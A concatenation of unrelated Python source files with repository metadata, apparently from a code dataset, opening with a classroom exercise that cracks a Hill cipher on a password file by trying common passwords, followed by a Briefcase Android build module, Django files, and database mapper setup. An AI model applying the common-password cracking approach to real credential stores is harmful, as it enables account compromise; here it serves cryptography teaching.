have all been encrypted with a 2x2 matrix transformation (e.g. a Hill Cipher) and hope that at least one person in the
school was lazy enough to use one of the top 1,000 most common passwords (possibly padded with extra random letters).
Using your python libraries and the attached files, crack the code and determine
1) the encryption matrix
2) the userID of the person who used a common password and their password
3) the userID/password of one other person with a recognizable password (not on the top 1000 list)
handy code:
#### open a text file. read it line by line. strip the "\n" off each line. then split the line into three strings w1,w2,w3, separated by whitespace.
in = open("myFile","r")
for line in in.readlines():
line = line.strip()
(w1,w2,w3) = line.split()
in.close()
For this (improved?) version of the problem, there is a new password file to decrypt. This time you know that 3 people have
selected passwords from the common list, and that you only need to worry about passwords on the common list of length > 5.
"""
import enchant #import dictionary library
from sympy import * #our buddy sympy
from MatrixCiphers import * #helper matrix methods
from Cryptoalpha import * #helper cryptoalphabet methods
dictionary = enchant.Dict("en_US") #english library
alphabet = Cryptoalpha("!\"#$%&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]")#61 char alphabet
m = 61 #mod value
passwordsFile = open("passwords-v2.txt","r") #encrypted passwords file open
allUsersList = []
allUserPassList = []
sizedUserList = []
sizedUserPassList = []
commonPassFile = open("common-passwords.txt","r") #common passwords file open
commonPasswordList = []
decryptionMatrix = Matrix([[0,0],[0,0]]) #this is where the final matrix will be stored once we find it
sillyUser = "" #this is the user who used the commonPassword
sillyEncryptedPassword = "" #this is that user's encrypted password that's in the file
sillyPassword = "" #that person's decrypted password we were able to crack
sillyIndex = 0
hackedUser = "" #this is the user we were able to find
hackedEncryptedPassword = "" #that person's encrypted password from the file
hackedPassword = "" #that person's decrypted password
#read in all the common passwords into a list
for common in commonPassFile.readlines():
common = common.strip() #get rid of the "\n"
commonPasswordList.append(common) #add it to our list
#print(common)
#for loop going through the logins file line by line
for logins in passwordsFile.readlines():
logins = logins.strip() #get rid of the "\n"
(userid, encpwd) = logins.split() #userid = string of username ; encpwd = encrypted password from that person
allUsersList.append(userid) #add all the userids to a list
allUserPassList.append(encpwd) #add all the passwords encrypted to a list
#print(userid + " " + encpwd)
if len(encpwd) > 5: #if the password length is more than 5
sizedUserList.append(userid) #add the username to a separate list
sizedUserPassList.append(encpwd) #add the password to a separate list
#print(encpwd)
index = 0 #index of the sized user/sized password
counter = 0 #counter for number of elements
totalCombos = 0
randomUser = 250 #we can probably make this a random number generator but for simplicity's sake, we'll just grab someone from the middle
for users in allUsersList:
counter += 1 #yay another element has been counted
if index < len(allUsersList): #if the index is less than the size of the list of usernames (just a bounds check)
thisUserPassword = allUserPassList[index] #pull the password for convenience
if len(thisUserPassword) > 5: #is it long enough for us to use?
for commonPass in commonPasswordList:
totalCombos += 1
consideration = commonPass #we have our potential plaintext / the common password being considered
#print(users + " " + thisUserPassword + " " + consideration)
fourCharC = thisUserPassword[:4] #first four characters of the encrypted Password
#print(fourCharC)
fourCharP = consideration[:4] #first 4 characters of the possible common password
#print(fourCharP)
testMatrix = get_decryption_matrix(fourCharP, fourCharC , alphabet) #plaintext, ciphertext, alphabet
#pprint(testMatrix) #print the test matrix
#ok so test the matrix to make sure it's a good one
if(testMatrix != None):
#pprint(testMatrix)
determinant = gcd(det(testMatrix), m) #use some sympy methods
if determinant == 1:
#print(determinant) #gcd is 1 = invertible matrix
decryptedPassword = decrypt(testMatrix, thisUserPassword, alphabet) #decrypt the password with the matrix
if decryptedPassword[:6] == commonPass: #if the full decrypted password matches the common password
#yay we have the right matrix
decryptionMatrix = testMatrix #save the matrix
sillyUser = users #save the username
sillyEncryptedPassword = thisUserPassword #save the encrypted password (for reference)
sillyPassword = decryptedPassword #save their actual password
sillyIndex = index #save the index
print("Here is one person's information:")
pprint(decryptionMatrix) #print stuff out
print(sillyUser)
print(sillyEncryptedPassword)
print(sillyPassword)
break #??? should this be good?
index += 1 #go to the next ones
print("Yay we're at the end of the file")
pprint(decryptionMatrix) #print stuff out
print(sillyUser)
print(sillyEncryptedPassword)
print(sillyPassword)
#cool now we should decrypt another random person's stuff (just for fun)
theOtherUser = allUsersList[randomUser] #grab their username
theOtherUserPass = allUserPassList[randomUser] #grab their encrypted password
decryptedMessage = decrypt(decryptionMatrix, theOtherUserPass, alphabet) #let's crack it using the decryption matrix from above
"""
#ideally we would check to make sure it is English, but it's possible there may be padding letters that would mess up this test
checking = dictionary.check(decryptedMessage) #is this password a real english word in the dictionary?
if checking is True: #if it passes our test
print("The other User: " + theOtherUser) #Print stuff out
print("Their encrypted password: " + theOtherUserPass)
print("Their decrypted password: " + decryptedMessage)
else: #what else can we do?
print("WRONG The other User: " + theOtherUser) #Print stuff out
print("WRONG Their encrypted password: " + theOtherUserPass)
print("WRONG Their decrypted password: " + decryptedMessage)
"""
print("The other User: " + theOtherUser) #Print stuff out
print("Their encrypted password: " + theOtherUserPass)
print("Their decrypted password: " + decryptedMessage)
| 51.863309
| 148
| 0.746012
|
4a07b88e142893dd3e525ab91da5a15878f25da1
| 435
|
py
|
Python
|
output/models/ms_data/datatypes/facets/g_year_month/g_year_month_pattern001_xsd/g_year_month_pattern001.py
|
tefra/xsdata-w3c-tests
|
b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f
|
[
"MIT"
] | 1
|
2021-08-14T17:59:21.000Z
|
2021-08-14T17:59:21.000Z
|
output/models/ms_data/datatypes/facets/g_year_month/g_year_month_pattern001_xsd/g_year_month_pattern001.py
|
tefra/xsdata-w3c-tests
|
b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f
|
[
"MIT"
] | 4
|
2020-02-12T21:30:44.000Z
|
2020-04-15T20:06:46.000Z
|
output/models/ms_data/datatypes/facets/g_year_month/g_year_month_pattern001_xsd/g_year_month_pattern001.py
|
tefra/xsdata-w3c-tests
|
b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f
|
[
"MIT"
] | null | null | null |
from dataclasses import dataclass, field
from typing import Optional
@dataclass
class FooType:
class Meta:
name = "fooType"
foo: Optional[str] = field(
default=None,
metadata={
"type": "Element",
"namespace": "",
"required": True,
"pattern": r"[0-9]{4}-[0-9]{2}",
}
)
@dataclass
class Test(FooType):
class Meta:
name = "test"
| 17.4
| 44
| 0.51954
|
4a07b9968a1aa701265e61983f5fb36991703d21
| 1,709
|
py
|
Python
|
app/core/migrations/0001_initial.py
|
miguelcdpmarques/django-recipes-api
|
0f318809c03644d917e1aa68d8d34a3fd3b4b613
|
[
"MIT"
] | null | null | null |
app/core/migrations/0001_initial.py
|
miguelcdpmarques/django-recipes-api
|
0f318809c03644d917e1aa68d8d34a3fd3b4b613
|
[
"MIT"
] | null | null | null |
app/core/migrations/0001_initial.py
|
miguelcdpmarques/django-recipes-api
|
0f318809c03644d917e1aa68d8d34a3fd3b4b613
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.1.15 on 2020-04-22 17:38
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0009_alter_user_last_name_max_length'),
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('email', models.EmailField(max_length=255, unique=True)),
('name', models.CharField(max_length=255)),
('is_active', models.BooleanField(default=True)),
('is_staff', models.BooleanField(default=False)),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
],
options={
'abstract': False,
},
),
]
| 50.264706
| 266
| 0.63897
|
4a07ba6b408e0030c48f5ea193b532796ebe32da
| 9,234
|
py
|
Python
|
src/briefcase/platforms/android/gradle.py
|
pybee/briefcase
|
d7e9aa7bf15aa2abbc71e97aef9bea287129fdaa
|
[
"BSD-3-Clause"
] | 522
|
2015-07-28T16:06:18.000Z
|
2019-03-25T17:16:55.000Z
|
src/briefcase/platforms/android/gradle.py
|
pybee/briefcase
|
d7e9aa7bf15aa2abbc71e97aef9bea287129fdaa
|
[
"BSD-3-Clause"
] | 154
|
2015-09-17T02:50:55.000Z
|
2019-03-22T07:10:34.000Z
|
src/briefcase/platforms/android/gradle.py
|
pybee/briefcase
|
d7e9aa7bf15aa2abbc71e97aef9bea287129fdaa
|
[
"BSD-3-Clause"
] | 105
|
2015-09-25T08:43:26.000Z
|
2019-03-25T15:59:27.000Z
|
import re
import subprocess
from briefcase.commands import (
BuildCommand,
CreateCommand,
PackageCommand,
PublishCommand,
RunCommand,
UpdateCommand,
)
from briefcase.config import BaseConfig, parsed_version
from briefcase.exceptions import BriefcaseCommandError
from briefcase.integrations.android_sdk import AndroidSDK
def safe_formal_name(name):
"""Converts the name into a safe name on Android.
Certain characters (``/\\:<>"?*|``) can't be used as app names
on Android; ``!`` causes problems with Android build tooling.
Also ensure that trailing, leading, and consecutive whitespace
caused by removing punctuation is collapsed.
:param name: The candidate name
:returns: The safe version of the name.
"""
return re.sub(r"\s+", " ", re.sub(r'[!/\\:<>"\?\*\|]', "", name)).strip()
class GradleMixin:
output_format = "gradle"
platform = "android"
@property
def packaging_formats(self):
return ["aab"]
@property
def default_packaging_format(self):
return "aab"
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def bundle_path(self, app):
"""The path to the bundle for the app in the output format.
The bundle is the template-generated source form of the app.
The path will usually be a directory, the existence of which is
indicative that the template has been rolled out for an app.
This overrides the default behavior, using a "safe" formal name
:param app: The app config
"""
return (
self.platform_path / self.output_format / safe_formal_name(app.formal_name)
)
def binary_path(self, app):
return (
self.bundle_path(app)
/ "app"
/ "build"
/ "outputs"
/ "apk"
/ "debug"
/ "app-debug.apk"
)
def distribution_path(self, app, packaging_format):
return (
self.bundle_path(app)
/ "app"
/ "build"
/ "outputs"
/ "bundle"
/ "release"
/ "app-release.aab"
)
def gradlew_path(self, app):
gradlew = "gradlew.bat" if self.host_os == "Windows" else "gradlew"
return self.bundle_path(app) / gradlew
def verify_tools(self):
"""Verify that we the Android APK tools in `briefcase` will operate on
this system, downloading tools as needed."""
super().verify_tools()
self.android_sdk = AndroidSDK.verify(self)
class GradleCreateCommand(GradleMixin, CreateCommand):
description = "Create and populate an Android APK."
def output_format_template_context(self, app: BaseConfig):
"""Additional template context required by the output format.
:param app: The config object for the app
"""
# Android requires an integer "version code". If a version code
# isn't explicitly provided, generate one from the version number.
# The build number will also be appended, if provided.
try:
version_code = app.version_code
except AttributeError:
parsed = parsed_version(app.version)
v = (list(parsed.release) + [0, 0])[:3] # version triple
build = int(getattr(app, "build", "0"))
version_code = f"{v[0]:d}{v[1]:02d}{v[2]:02d}{build:02d}".lstrip("0")
return {
"version_code": version_code,
"safe_formal_name": safe_formal_name(app.formal_name),
}
class GradleUpdateCommand(GradleMixin, UpdateCommand):
description = "Update an existing Android debug APK."
class GradleBuildCommand(GradleMixin, BuildCommand):
description = "Build an Android debug APK."
def build_app(self, app: BaseConfig, **kwargs):
"""Build an application.
:param app: The application to build
"""
self.logger.info("Building Android APK...", prefix=app.app_name)
try:
self.subprocess.run(
# Windows needs the full path to `gradlew`; macOS & Linux can find it
# via `./gradlew`. For simplicity of implementation, we always provide
# the full path.
[self.gradlew_path(app), "assembleDebug"],
env=self.android_sdk.env,
# Set working directory so gradle can use the app bundle path as its
# project root, i.e., to avoid 'Task assembleDebug not found'.
cwd=self.bundle_path(app),
check=True,
)
except subprocess.CalledProcessError as e:
raise BriefcaseCommandError("Error while building project.") from e
class GradleRunCommand(GradleMixin, RunCommand):
description = "Run an Android debug APK on a device (physical or virtual)."
def verify_tools(self):
super().verify_tools()
self.android_sdk.verify_emulator()
def add_options(self, parser):
super().add_options(parser)
parser.add_argument(
"-d",
"--device",
dest="device_or_avd",
help="The device to target; either a device ID for a physical device, "
" or an AVD name ('@emulatorName') ",
required=False,
)
def run_app(self, app: BaseConfig, device_or_avd=None, **kwargs):
"""Start the application.
:param app: The config object for the app
:param device: The device to target. If ``None``, the user will
be asked to re-run the command selecting a specific device.
"""
device, name, avd = self.android_sdk.select_target_device(
device_or_avd=device_or_avd
)
# If there's no device ID, that means the emulator isn't running.
# If there's no AVD either, it means the user has chosen to create
# an entirely new emulator. Create the emulator (if necessary),
# then start it.
if device is None:
if avd is None:
avd = self.android_sdk.create_emulator()
device, name = self.android_sdk.start_emulator(avd)
self.logger.info()
self.logger.info(
f"Starting app on {name} (device ID {device})", prefix=app.app_name
)
# Create an ADB wrapper for the selected device
adb = self.android_sdk.adb(device=device)
# Compute Android package name. The Android template uses
# `package_name` and `module_name`, so we use those here as well.
package = f"{app.package_name}.{app.module_name}"
# We force-stop the app to ensure the activity launches freshly.
self.logger.info()
self.logger.info("Stopping old versions of the app...", prefix=app.app_name)
adb.force_stop_app(package)
# Install the latest APK file onto the device.
self.logger.info()
self.logger.info("Installing app...", prefix=app.app_name)
adb.install_apk(self.binary_path(app))
self.logger.info()
self.logger.info("Clearing device log...", prefix=app.app_name)
adb.clear_log()
# To start the app, we launch `org.beeware.android.MainActivity`.
self.logger.info()
self.logger.info("Launching app...", prefix=app.app_name)
adb.start_app(package, "org.beeware.android.MainActivity")
self.logger.info()
self.logger.info(
"Following device log output (type CTRL-C to stop log)...",
prefix=app.app_name,
)
self.logger.info("=" * 75)
adb.logcat()
class GradlePackageCommand(GradleMixin, PackageCommand):
description = "Create an Android App Bundle and APK in release mode."
def package_app(self, app: BaseConfig, **kwargs):
"""Package the app for distribution.
This involves building the release app bundle.
:param app: The application to build
"""
self.logger.info(
"Building Android App Bundle and APK in release mode...",
prefix=app.app_name,
)
try:
self.subprocess.run(
# Windows needs the full path to `gradlew`; macOS & Linux can find it
# via `./gradlew`. For simplicity of implementation, we always provide
# the full path.
[self.gradlew_path(app), "bundleRelease"],
env=self.android_sdk.env,
# Set working directory so gradle can use the app bundle path as its
# project root, i.e., to avoid 'Task bundleRelease not found'.
cwd=self.bundle_path(app),
check=True,
)
except subprocess.CalledProcessError as e:
raise BriefcaseCommandError("Error while building project.") from e
class GradlePublishCommand(GradleMixin, PublishCommand):
description = "Publish an Android APK."
# Declare the briefcase command bindings
create = GradleCreateCommand # noqa
update = GradleUpdateCommand # noqa
build = GradleBuildCommand # noqa
run = GradleRunCommand # noqa
package = GradlePackageCommand # noqa
publish = GradlePublishCommand # noqa
| 34.327138
| 87
| 0.615551
|
4a07bb353a629c0e2742aa7f35c3e16a7ab45b57
| 19,549
|
py
|
Python
|
thelma/repositories/rdb/mappers/__init__.py
|
fogathmann/TheLMA
|
ac330a0005da4fea2f1387da9ff9938611ad1481
|
[
"MIT"
] | 1
|
2020-07-12T22:47:58.000Z
|
2020-07-12T22:47:58.000Z
|
thelma/repositories/rdb/mappers/__init__.py
|
papagr/TheLMA
|
d2dc7a478ee5d24ccf3cc680888e712d482321d0
|
[
"MIT"
] | null | null | null |
thelma/repositories/rdb/mappers/__init__.py
|
papagr/TheLMA
|
d2dc7a478ee5d24ccf3cc680888e712d482321d0
|
[
"MIT"
] | 1
|
2020-07-12T22:40:36.000Z
|
2020-07-12T22:40:36.000Z
|
from thelma.repositories.rdb.mappers import amplicondesign
from thelma.repositories.rdb.mappers import antimirdesign
from thelma.repositories.rdb.mappers import barcodedlocation
from thelma.repositories.rdb.mappers import barcodedlocationrack
from thelma.repositories.rdb.mappers import barcodedlocationtype
from thelma.repositories.rdb.mappers import chemicalstructure
from thelma.repositories.rdb.mappers import cloneddsdnadesign
from thelma.repositories.rdb.mappers import compoundchemicalstructure
from thelma.repositories.rdb.mappers import compounddesign
from thelma.repositories.rdb.mappers import container
from thelma.repositories.rdb.mappers import tubelocation
from thelma.repositories.rdb.mappers import containerspecs
from thelma.repositories.rdb.mappers import device
from thelma.repositories.rdb.mappers import devicetype
from thelma.repositories.rdb.mappers import esirnadesign
from thelma.repositories.rdb.mappers import executedliquidtransfer
from thelma.repositories.rdb.mappers import executedracksampletransfer
from thelma.repositories.rdb.mappers import executedsampledilution
from thelma.repositories.rdb.mappers import executedsampletransfer
from thelma.repositories.rdb.mappers import executedworklist
from thelma.repositories.rdb.mappers import experiment
from thelma.repositories.rdb.mappers import experimentdesign
from thelma.repositories.rdb.mappers import experimentdesignrack
from thelma.repositories.rdb.mappers import experimentjob
from thelma.repositories.rdb.mappers import experimentmetadata
from thelma.repositories.rdb.mappers import experimentmetadatatype
from thelma.repositories.rdb.mappers import experimentrack
from thelma.repositories.rdb.mappers import gene
from thelma.repositories.rdb.mappers import iso
from thelma.repositories.rdb.mappers import isoaliquotplate
from thelma.repositories.rdb.mappers import isojob
from thelma.repositories.rdb.mappers import isojobpreparationplate
from thelma.repositories.rdb.mappers import isojobstockrack
from thelma.repositories.rdb.mappers import isoplate
from thelma.repositories.rdb.mappers import isopreparationplate
from thelma.repositories.rdb.mappers import isorequest
from thelma.repositories.rdb.mappers import isosectorpreparationplate
from thelma.repositories.rdb.mappers import isosectorstockrack
from thelma.repositories.rdb.mappers import isostockrack
from thelma.repositories.rdb.mappers import itemstatus
from thelma.repositories.rdb.mappers import job
from thelma.repositories.rdb.mappers import labiso
from thelma.repositories.rdb.mappers import labisorequest
from thelma.repositories.rdb.mappers import libraryplate
from thelma.repositories.rdb.mappers import longdsrnadesign
from thelma.repositories.rdb.mappers import mirnainhibitordesign
from thelma.repositories.rdb.mappers import mirnamimicdesign
from thelma.repositories.rdb.mappers import modificationchemicalstructure
from thelma.repositories.rdb.mappers import molecule
from thelma.repositories.rdb.mappers import moleculedesign
from thelma.repositories.rdb.mappers import moleculedesignlibrary
from thelma.repositories.rdb.mappers import moleculedesignpool
from thelma.repositories.rdb.mappers import moleculedesignpoolset
from thelma.repositories.rdb.mappers import moleculedesignsetbase
from thelma.repositories.rdb.mappers import moleculetype
from thelma.repositories.rdb.mappers import nucleicacidchemicalstructure
from thelma.repositories.rdb.mappers import organization
from thelma.repositories.rdb.mappers import pipettingspecs
from thelma.repositories.rdb.mappers import plannedliquidtransfer
from thelma.repositories.rdb.mappers import plannedracksampletransfer
from thelma.repositories.rdb.mappers import plannedsampledilution
from thelma.repositories.rdb.mappers import plannedsampletransfer
from thelma.repositories.rdb.mappers import plannedworklist
from thelma.repositories.rdb.mappers import plate
from thelma.repositories.rdb.mappers import platespecs
from thelma.repositories.rdb.mappers import primerdesign
from thelma.repositories.rdb.mappers import project
from thelma.repositories.rdb.mappers import rack
from thelma.repositories.rdb.mappers import racklayout
from thelma.repositories.rdb.mappers import rackposition
from thelma.repositories.rdb.mappers import rackpositionset
from thelma.repositories.rdb.mappers import rackshape
from thelma.repositories.rdb.mappers import rackspecs
from thelma.repositories.rdb.mappers import reservoirspecs
from thelma.repositories.rdb.mappers import samplemolecule
from thelma.repositories.rdb.mappers import sampleregistration
from thelma.repositories.rdb.mappers import sirnadesign
from thelma.repositories.rdb.mappers import species
from thelma.repositories.rdb.mappers import moleculedesignset
from thelma.repositories.rdb.mappers import stockinfo
from thelma.repositories.rdb.mappers import stockrack
from thelma.repositories.rdb.mappers import stocksample
from thelma.repositories.rdb.mappers import stocksamplecreationiso
from thelma.repositories.rdb.mappers import stocksamplecreationisorequest
from thelma.repositories.rdb.mappers import subproject
from thelma.repositories.rdb.mappers import suppliermoleculedesign
from thelma.repositories.rdb.mappers import supplierstructureannotation
from thelma.repositories.rdb.mappers import tag
from thelma.repositories.rdb.mappers import tagged
from thelma.repositories.rdb.mappers import taggedrackpositionset
from thelma.repositories.rdb.mappers import tagging
from thelma.repositories.rdb.mappers import tube
from thelma.repositories.rdb.mappers import tuberack
from thelma.repositories.rdb.mappers import tuberackspecs
from thelma.repositories.rdb.mappers import tubespecs
from thelma.repositories.rdb.mappers import tubetransfer
from thelma.repositories.rdb.mappers import tubetransferworklist
from thelma.repositories.rdb.mappers import unknownchemicalstructure
from thelma.repositories.rdb.mappers import user
from thelma.repositories.rdb.mappers import userpreferences
from thelma.repositories.rdb.mappers import well
from thelma.repositories.rdb.mappers import wellspecs
from thelma.repositories.rdb.mappers import worklistseries
from thelma.repositories.rdb.mappers import worklistseriesmember
from thelma.repositories.rdb.mappers import sample
def initialize_mappers(tables, views):
organization.create_mapper(tables['organization'])
itemstatus.create_mapper(tables['item_status'])
containerspecs_mapper = \
containerspecs.create_mapper(tables['container_specs'])
tubespecs.create_mapper(containerspecs_mapper,
tables['rack_specs_container_specs'])
wellspecs.create_mapper(containerspecs_mapper,
tables['rack_specs_container_specs'])
container_mapper = container.create_mapper(tables['container'])
tube.create_mapper(container_mapper, tables['tube'])
well.create_mapper(container_mapper, tables['well'])
rack_mapper = rack.create_mapper(tables['rack'],
tables['rack_barcoded_location'])
tuberack.create_mapper(rack_mapper, tables['tube_rack'],
tables['tube_location'])
plate.create_mapper(rack_mapper, tables['plate'])
tubelocation.create_mapper(tables['tube_location'])
rackshape.create_mapper(tables['rack_shape'])
rackspecs_mapper = rackspecs.create_mapper(tables['rack_specs'])
tuberackspecs.create_mapper(rackspecs_mapper,
tables['rack_specs_container_specs'])
platespecs.create_mapper(rackspecs_mapper,
tables['rack_specs_container_specs'])
devicetype.create_mapper(tables['device_type'])
device.create_mapper(tables['device'])
barcodedlocation.create_mapper(tables['barcoded_location'],
tables['rack_barcoded_location'])
barcodedlocationrack.create_mapper(tables['rack_barcoded_location'])
barcodedlocationtype.create_mapper(tables['barcoded_location'])
moleculetype.create_mapper(tables['molecule_type'],
views['molecule_type_modification_view'],
tables['chemical_structure'])
samplemolecule.create_mapper(tables['sample_molecule'])
molecule.create_mapper(tables['molecule'],
tables['molecule_supplier_molecule_design'])
sample_mapper = sample.create_mapper(tables['sample'],
tables['sample_molecule'], tables['molecule'],
tables['molecule_design_pool'])
sampleregistration.create_mapper(tables['sample_registration'])
gene.create_mapper(tables['refseq_gene'],
tables['molecule_design_gene'],
tables['molecule_design_set_gene'],
tables['molecule_design'],
tables['molecule_design_pool'])
species.create_mapper(tables['species'])
stockinfo.create_mapper(views['stock_info_view'],
tables['molecule_design_set'],
tables['molecule_design_set_gene'],
tables['refseq_gene'])
chemical_structure_mapper = \
chemicalstructure.create_mapper(tables['chemical_structure'],
tables['molecule_design_structure'])
compoundchemicalstructure.create_mapper(chemical_structure_mapper,
tables['chemical_structure'])
nucleicacidchemicalstructure.create_mapper(chemical_structure_mapper,
tables['chemical_structure'])
modificationchemicalstructure.create_mapper(chemical_structure_mapper,
tables['chemical_structure'])
unknownchemicalstructure.create_mapper(chemical_structure_mapper,
tables['chemical_structure'])
molecule_design_mapper = \
moleculedesign.create_mapper(tables['molecule_design'],
tables['molecule_design_structure'],
tables['single_supplier_molecule_design'],
tables['molecule_design_gene'],
tables['refseq_gene'])
molecule_design_set_mapper = \
moleculedesignsetbase.create_mapper(tables['molecule_design_set'],
tables['molecule_design_set_member'])
moleculedesignlibrary.create_mapper(tables['molecule_design_library'],
tables['stock_sample_creation_iso_request'],
tables['molecule_design_library_creation_iso_request'])
libraryplate.create_mapper(tables['library_plate'],
tables['lab_iso_library_plate'])
moleculedesignset.create_mapper(
molecule_design_set_mapper)
moleculedesignpool.create_mapper(
molecule_design_set_mapper,
tables['molecule_design_pool'],
tables['pooled_supplier_molecule_design'],
tables['supplier_molecule_design'],
tables['molecule_design_set_gene'])
stocksample.create_mapper(sample_mapper, tables['stock_sample'],
tables['pooled_supplier_molecule_design'],
tables['supplier_molecule_design'])
moleculedesignpoolset.create_mapper(
tables['molecule_design_pool_set'],
tables['molecule_design_pool_set_member'],
)
compounddesign.create_mapper(molecule_design_mapper,
tables['molecule_design'])
antimirdesign.create_mapper(molecule_design_mapper,
tables['molecule_design'])
cloneddsdnadesign.create_mapper(molecule_design_mapper,
tables['molecule_design'])
esirnadesign.create_mapper(molecule_design_mapper,
tables['molecule_design'])
longdsrnadesign.create_mapper(molecule_design_mapper,
tables['molecule_design'])
primerdesign.create_mapper(molecule_design_mapper,
tables['molecule_design'])
amplicondesign.create_mapper(molecule_design_mapper,
tables['molecule_design'])
sirnadesign.create_mapper(molecule_design_mapper,
tables['molecule_design'])
mirnainhibitordesign.create_mapper(molecule_design_mapper,
tables['molecule_design'])
mirnamimicdesign.create_mapper(molecule_design_mapper,
tables['molecule_design'])
suppliermoleculedesign.create_mapper(
tables['supplier_molecule_design'],
tables['single_supplier_molecule_design'],
tables['pooled_supplier_molecule_design'])
supplierstructureannotation.create_mapper(
tables['supplier_structure_annotation'])
tagging.create_mapper(tables['tagging'])
tag.create_mapper(tables['tag'], tables['tag_domain'],
tables['tag_predicate'], tables['tag_value'],
tables['tagging'])
tagged_mapper = tagged.create_mapper(tables['tagged'], tables['tagging'])
taggedrackpositionset.create_mapper(tagged_mapper,
tables['tagged_rack_position_set'])
rackpositionset.create_mapper(tables['rack_position_set'],
tables['rack_position_set_member'])
rackposition.create_mapper(tables['rack_position'])
racklayout.create_mapper(tables['rack_layout'])
job_mapper = job.create_mapper(tables['new_job'])
# FIXME: pylint: disable=W0511
# Need to get rid of the "new_" prefix.
experiment.create_mapper(tables['new_experiment'],
tables['experiment_source_rack'])
experimentdesignrack.create_mapper(tables['experiment_design_rack'],
tables['worklist_series_experiment_design_rack'])
experimentdesign.create_mapper(tables['experiment_design'],
tables['worklist_series_experiment_design'])
experimentrack.create_mapper(tables['new_experiment_rack'])
experimentmetadatatype.create_mapper(tables['experiment_metadata_type'])
experimentmetadata.create_mapper(tables['experiment_metadata'],
tables['experiment_metadata_iso_request'])
experimentjob.create_mapper(job_mapper, tables['new_job'],
tables['new_experiment'])
project.create_mapper(tables['project'])
subproject.create_mapper(tables['subproject'])
user.create_mapper(tables['db_user'])
userpreferences.create_mapper(tables['user_preferences'])
iso_request_mapper = isorequest.create_mapper(tables['iso_request'],
tables['worklist_series_iso_request'],
tables['iso_request_pool_set'])
labisorequest.create_mapper(iso_request_mapper, tables['lab_iso_request'],
tables['experiment_metadata_iso_request'],
tables['reservoir_specs'],
tables['molecule_design_library_lab_iso_request'])
stocksamplecreationisorequest.create_mapper(iso_request_mapper,
tables['stock_sample_creation_iso_request'],
tables['molecule_design_library_creation_iso_request'],
tables['molecule_design_library'])
iso_mapper = iso.create_mapper(tables['iso'], tables['new_job'],
tables['iso_job_member'], tables['iso_pool_set'])
labiso.create_mapper(iso_mapper, tables['iso'],
tables['lab_iso_library_plate'])
stocksamplecreationiso.create_mapper(iso_mapper,
tables['stock_sample_creation_iso'])
isojob.create_mapper(job_mapper, tables['iso_job'],
tables['iso_job_member'],
tables['worklist_series_iso_job'])
isojobpreparationplate.create_mapper(tables['iso_job_preparation_plate'])
stock_rack_mapper = stockrack.create_mapper(tables['stock_rack'])
isojobstockrack.create_mapper(stock_rack_mapper,
tables['iso_job_stock_rack'])
isostockrack.create_mapper(stock_rack_mapper, tables['iso_stock_rack'])
isosectorstockrack.create_mapper(stock_rack_mapper,
tables['iso_sector_stock_rack'])
iso_plate_mapper = isoplate.create_mapper(tables['iso_plate'])
isoaliquotplate.create_mapper(iso_plate_mapper,
tables['iso_aliquot_plate'])
isopreparationplate.create_mapper(iso_plate_mapper,
tables['iso_preparation_plate'])
isosectorpreparationplate.create_mapper(iso_plate_mapper,
tables['iso_sector_preparation_plate'])
pipettingspecs.create_mapper(tables['pipetting_specs'])
reservoirspecs.create_mapper(tables['reservoir_specs'])
planned_liquid_transfer_mapper = plannedliquidtransfer.create_mapper(
tables['planned_liquid_transfer'])
plannedsampledilution.create_mapper(planned_liquid_transfer_mapper,
tables['planned_sample_dilution'], tables['rack_position'])
plannedsampletransfer.create_mapper(planned_liquid_transfer_mapper,
tables['planned_sample_transfer'], tables['rack_position'])
plannedracksampletransfer.create_mapper(planned_liquid_transfer_mapper,
tables['planned_rack_sample_transfer'])
plannedworklist.create_mapper(tables['planned_worklist'],
tables['planned_liquid_transfer'],
tables['planned_worklist_member'])
worklistseries.create_mapper(tables['worklist_series'])
worklistseriesmember.create_mapper(tables['worklist_series_member'])
executed_liquid_transfer_mapper = executedliquidtransfer.create_mapper(
tables['executed_liquid_transfer'])
executedsampledilution.create_mapper(executed_liquid_transfer_mapper,
tables['executed_sample_dilution'], tables['container'])
executedsampletransfer.create_mapper(executed_liquid_transfer_mapper,
tables['executed_sample_transfer'], tables['container'])
executedracksampletransfer.create_mapper(executed_liquid_transfer_mapper,
tables['executed_rack_sample_transfer'], tables['rack'])
executedworklist.create_mapper(tables['executed_worklist'],
tables['executed_liquid_transfer'],
tables['executed_worklist_member'])
tubetransfer.create_mapper(tables['tube_transfer'], tables['rack'],
tables['rack_position'])
tubetransferworklist.create_mapper(tables['tube_transfer_worklist'],
tables['tube_transfer'],
tables['tube_transfer_worklist_member'],
tables['db_user'])
| 59.239394
| 79
| 0.705765
|
4a07bb4334769c21fc325a37522548e1626d2d04
| 231
|
py
|
Python
|
caffshop/webshop/filters.py
|
Jezus-es-a-haverok/CaffShop
|
222f9945e77228ecc8fa73c9bb4fad8799af0825
|
[
"MIT"
] | null | null | null |
caffshop/webshop/filters.py
|
Jezus-es-a-haverok/CaffShop
|
222f9945e77228ecc8fa73c9bb4fad8799af0825
|
[
"MIT"
] | null | null | null |
caffshop/webshop/filters.py
|
Jezus-es-a-haverok/CaffShop
|
222f9945e77228ecc8fa73c9bb4fad8799af0825
|
[
"MIT"
] | null | null | null |
import django_filters
from .models import CAFF
class CAFFFilter(django_filters.FilterSet):
class Meta:
model = CAFF
fields = {
'creator': ['icontains'],
'name': ['icontains'],
}
| 21
| 43
| 0.5671
|
4a07bb47dd2f03440f474b08d1d2d90cac942e8f
| 7,182
|
py
|
